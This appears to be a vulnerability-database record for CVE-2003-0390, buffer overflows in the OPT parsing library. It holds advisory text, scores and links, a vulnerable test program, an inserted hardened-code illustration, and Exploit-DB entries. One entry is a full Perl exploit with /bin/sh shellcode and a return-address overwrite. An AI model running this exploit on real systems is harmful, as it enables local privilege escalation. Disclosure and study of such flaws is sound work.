CVE-2003-0390
CVSS 4.6
Published: 2003-07-02 00:00:00
Revised: 2016-10-17 22:33:14

[Original] Multiple buffer overflows in Options Parsing Tool (OPT) shared library 3.18 and earlier, when used in setuid programs, may allow local users to execute arbitrary code via long command line options that are fed into macros such as opt_warn_2, as used in functions such as opt_atoi.


[CNNVD] Options Parsing Tool (OPT) shared library code execution vulnerability (CNNVD-200307-012)

        Options Parsing Tool (OPT) shared library 3.18 and earlier contain multiple buffer overflow vulnerabilities when used in setuid programs. A local user can exploit them to execute arbitrary code by supplying an overly long command line option that is fed into macros such as opt_warn_2, as used in functions such as opt_atoi.

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0390
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0390
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200307-012
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=105121918523320&w=2
(UNKNOWN)  BUGTRAQ  20030424 SRT2003-04-24-1532 - Options Parsing Tool library buffer overflows.
http://marc.info/?l=bugtraq&m=105371246204866&w=2
(UNKNOWN)  BUGTRAQ  20030523 Re: Options Parsing Tool library buffer overflows.
http://nis-www.lanl.gov/~jt/Software/opt/opt-3.19.tar.gz
(PATCH)  CONFIRM  http://nis-www.lanl.gov/~jt/Software/opt/opt-3.19.tar.gz

- Vulnerability information

Options Parsing Tool (OPT) shared library code execution vulnerability
Medium severity; buffer overflow
2003-07-02 00:00:00 2005-11-29 00:00:00
Local

- Advisories and patches


- Vulnerability information (22537)

Libopt.a 3.1x Error Logging Buffer Overflow Vulnerability (1) (EDBID:22537)
linux dos
2003-04-24 Verified
0 kf
N/A
source: http://www.securityfocus.com/bid/7433/info

Libopt library has been reported prone to a buffer overflow vulnerability.

It has been reported that several Libopt.a error logging functions may be prone to buffer overflow vulnerabilities when handling excessive data. The data may be supplied as an argument to a program linked to the vulnerable library. This condition arises from a lack of sufficient bounds checking performed on the user-supplied data before it is copied into a memory buffer. As a result, the bounds of an internal stack-based memory buffer may be overflowed and adjacent memory corrupted with attacker-supplied data. It should be noted that no SUID applications linked to this library are currently known.

Although unconfirmed, this vulnerability may be exploited to execute arbitrary attacker-supplied code.

It should be noted that although this vulnerability was reported to affect Libopt.a version 3.18, previous versions might also be affected.

/* To compile vuln.c :                              */
/* cc -o vuln vuln.c /path/to/opt-3.18/src/libopt.a */

#include <stdio.h>
#include "opt.h"        /* OPT's own header, declares opt_atoi() */

int main(int argc, char **argv)
{
  if (argc < 2) {
    fprintf(stderr, "usage: %s <value>\n", argv[0]);
    return 1;
  }
  /* use OPT opt_atoi(): a long argv[1] reaches the unbounded opt_warn_2 macro */
  int y = opt_atoi(argv[1]);
  printf("opt_atoi(): %i\n", y);
  return 0;
}
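As an added illustration (not code from the OPT library, from opt-3.19, or from this record), here is the defensive shape the fix needs: an error-logging helper in the role of opt_warn_2 that bounds its stack buffer with snprintf and reports truncation, and an opt_atoi-style parser that validates its input before warning. The names warn_2_safe, safe_atoi, atoi_ok and long_option_truncated, and the 256-byte buffer, are assumptions chosen for the example.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hardened stand-in for an error-logging macro like opt_warn_2. The flaw in
 * opt <= 3.18 was user text copied into a fixed stack buffer with no bound;
 * here snprintf() enforces sizeof buf and truncation is reported, not hidden.
 * Returns 1 if the message was truncated, 0 if it fit, -1 on format error. */
int warn_2_safe(const char *what, const char *value)
{
    char buf[256];                       /* fixed-size stack buffer, bounded below */
    int n = snprintf(buf, sizeof buf, "opt: %s: %s\n", what, value);
    if (n < 0) return -1;
    fputs(buf, stderr);                  /* snprintf always NUL-terminates */
    return (size_t)n >= sizeof buf ? 1 : 0;
}

/* Hardened opt_atoi()-style parser: validates with strtol() and routes any
 * complaint through the bounded warner. Returns 0 on success, -1 otherwise. */
int safe_atoi(const char *s, int *out)
{
    char *end;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE || v > INT_MAX || v < INT_MIN) {
        warn_2_safe("not a valid integer", s);
        return -1;
    }
    *out = (int)v;
    return 0;
}

/* Returns 1 if safe_atoi(s) succeeds and yields expect, else 0. */
int atoi_ok(const char *s, int expect)
{
    int v = 0;
    return safe_atoi(s, &v) == 0 && v == expect;
}

/* Constructed input: an option of len 'A' bytes, like the oversized argv[1]
 * in the advisory; returns warn_2_safe()'s truncation flag for it. */
int long_option_truncated(size_t len)
{
    char *big = malloc(len + 1);
    if (!big) return -1;
    memset(big, 'A', len); big[len] = '\0';
    int rc = warn_2_safe("rejected option", big);
    free(big);
    return rc;
}
```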


- Vulnerability information (22538)

Libopt.a 3.1x Error Logging Buffer Overflow Vulnerability (2) (EDBID:22538)
linux local
2003-04-24 Verified
0 jlanthea
N/A
source: http://www.securityfocus.com/bid/7433/info
 

#!/usr/bin/perl
#
# expl-optatoi.pl : opt_atoi() function exploit (from Options Parsing
# Tool shared library opt-3.18 and prior) for this vulnerable code.
#
# vuln.c :
#    main(int *argc, char **argv)
#    {
#        /* use OPT opt_atoi() */
#        int y = opt_atoi(argv[1]);
#        printf("opt_atoi(): %i\n", y);
#     }
#
# cc -o vuln vuln.c /path/to/opt-3.18/src/libopt.a
#
# Author :
#    jlanthea [contact@jlanthea.net]
#
# Syntax :
#    perl expl-optatoi.pl <offset>   # works for me with offset = -1090


$shellcode = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
             "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
             "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
             "\xff\xff/bin/sh";


$len = 1032;        # The length needed to own EIP.
$ret = 0xbffff6c0;  # The stack pointer at crash time
$nop = "\x90";      # x86 NOP
$offset = 0;    # Default offset to try.


if (@ARGV == 1) {
    $offset = $ARGV[0];
}

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}

$buffer .= $shellcode;

print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");

$new_ret = pack('l', ($ret + $offset));

for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}

exec("/path/to/vuln $buffer");


- Vulnerability information

12306
Options Parsing Tool (OPT) Library Multiple Error Message Functions Local Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-04-24 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete